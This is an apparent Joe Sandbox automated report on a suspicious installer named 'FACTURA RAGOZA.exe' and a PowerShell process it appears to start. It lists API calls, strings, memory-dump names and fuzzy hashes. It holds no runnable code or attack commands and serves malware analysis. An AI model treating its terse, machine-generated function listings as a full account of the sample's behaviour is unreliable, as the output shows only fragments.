vs, xrefs: 004039E9
Formynderisk Setup, xrefs: 004039FB

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\FACTURA RAGOZA.exe"$1033$Formynderisk Setup$vs
API String ID: 530164218-1667929403
Opcode ID: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
Opcode Fuzzy Hash: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9

Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
RegCloseKey.ADVAPI32(?), ref: 00402AE0
RegCloseKey.ADVAPI32(?), ref: 00402B05
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
Opcode Fuzzy Hash: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69

Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CE2
GetClientRect.USER32(00000000,?), ref: 00401CEF
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
DeleteObject.GDI32(00000000), ref: 00401D2D

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
Opcode Fuzzy Hash: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79

Function 00401D38 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D3B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
ReleaseDC.USER32(?,00000000), ref: 00401D68
CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
Opcode Fuzzy Hash: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F

Function 00404709 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
wsprintfA.USER32 ref: 004047AF
SetDlgItemTextA.USER32(?,00429868), ref: 004047C2

Strings

%u.%u%s%s, xrefs: 00404791

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
Opcode Fuzzy Hash: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8

Function 004057A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
lstrcatA.KERNEL32(?,00409014), ref: 004057C1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD

Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
GetTickCount.KERNEL32 ref: 00402C33
CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
ShowWindow.USER32(00000000,00000005), ref: 00402C5E

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D

Function 0040588F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Formynderisk Setup,NSIS Error), ref: 00405D3C

Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861

lstrlenA.KERNEL32(0042AC70,00000000,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
GetFileAttributesA.KERNEL32(0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,00000000,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040588F

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3081826266
Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E

Function 0040361A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
GlobalFree.KERNEL32(00000000), ref: 0040363B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC

Function 004057E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA RAGOZA.exe,C:\Users\user\Desktop\FACTURA RAGOZA.exe,80000000,00000003), ref: 004057EE
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA RAGOZA.exe,C:\Users\user\Desktop\FACTURA RAGOZA.exe,80000000,00000003), ref: 004057FC

Strings

C:\Users\user\Desktop, xrefs: 004057E8

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD

Function 00405907 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9

Analysis Process: powershell.exePID: 5808, Parent PID: 5936COMMON

Executed Functions

Function 076BC936 Relevance: 8.1, Strings: 5, Instructions: 1844COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076BC57A
4'^q, xrefs: 076BDDE1
4'^q, xrefs: 076BC61E
4'^q, xrefs: 076BD31C
4'^q, xrefs: 076BD310

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-4202989938
Opcode ID: 2c5c9e4f9ee3c92882c37b0a284531346ecfecc9eceff6ff53efe8f277a9afb7
Instruction ID: b26e66272d83420ff67f555542edff16b9ec4b77a3357e6bc1a352576e76f5f5
Opcode Fuzzy Hash: 2c5c9e4f9ee3c92882c37b0a284531346ecfecc9eceff6ff53efe8f277a9afb7
Instruction Fuzzy Hash: 5E0331B4A40219CFDB24DB64C950BEABBB2FB85304F1084D9D90AAB751DB32ED85CF51

Function 076B4D70 Relevance: 26.0, Strings: 20, Instructions: 1038COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076B53BF
4'^q, xrefs: 076B5323
4'^q, xrefs: 076B56CB
4'^q, xrefs: 076B4FD8
4'^q, xrefs: 076B5939
4'^q, xrefs: 076B527B
4'^q, xrefs: 076B4E7E
4'^q, xrefs: 076B5317
4'^q, xrefs: 076B526F
4'^q, xrefs: 076B5945
4'^q, xrefs: 076B4FE4
4'^q, xrefs: 076B53CB
4'^q, xrefs: 076B5080
4'^q, xrefs: 076B4E72
4'^q, xrefs: 076B4F3C
4'^q, xrefs: 076B4F30
4'^q, xrefs: 076B51C7
4'^q, xrefs: 076B51D3
4'^q, xrefs: 076B508C
4'^q, xrefs: 076B56D7

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-3098030321
Opcode ID: e2470a1691c58bc9939204c0abbbddb1a648267813ca35964bfd7d68c8a735b1
Instruction ID: 8c49ba5404ab852d97987f892a2d58c484f629ed036a0c734c4c0b0934e74904
Opcode Fuzzy Hash: e2470a1691c58bc9939204c0abbbddb1a648267813ca35964bfd7d68c8a735b1
Instruction Fuzzy Hash: D5926E70A10315CFDB14DFA8C455BAABBA2FB85304F2184A9D9066F356CB72EC85CF91

Function 076B4D4E Relevance: 13.3, Strings: 10, Instructions: 834COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076B53BF
4'^q, xrefs: 076B56CB
4'^q, xrefs: 076B4FD8
4'^q, xrefs: 076B5939
4'^q, xrefs: 076B5080
4'^q, xrefs: 076B4E72
4'^q, xrefs: 076B5317
4'^q, xrefs: 076B526F
4'^q, xrefs: 076B4F30
4'^q, xrefs: 076B51C7

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-518715366
Opcode ID: 4cfeef715d5f83a067acc72ca7e0610805aa33d2ec326b348fe1f8efbb94693d
Instruction ID: b5261f56db66b94d42cc207cf663a3e723cf1cc523a4cdb88baec7a4486874ec
Opcode Fuzzy Hash: 4cfeef715d5f83a067acc72ca7e0610805aa33d2ec326b348fe1f8efbb94693d
Instruction Fuzzy Hash: F6725C70A10315CFEB24DBA4C451F99BBB2FB85308F1584A9D9066F396CB72E885CF91

Function 076B3260 Relevance: 11.0, Strings: 8, Instructions: 1022COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076B4AA0
4'^q, xrefs: 076B4AAC
tP^q, xrefs: 076B3310
tP^q, xrefs: 076B3304
4'^q, xrefs: 076B4A2D
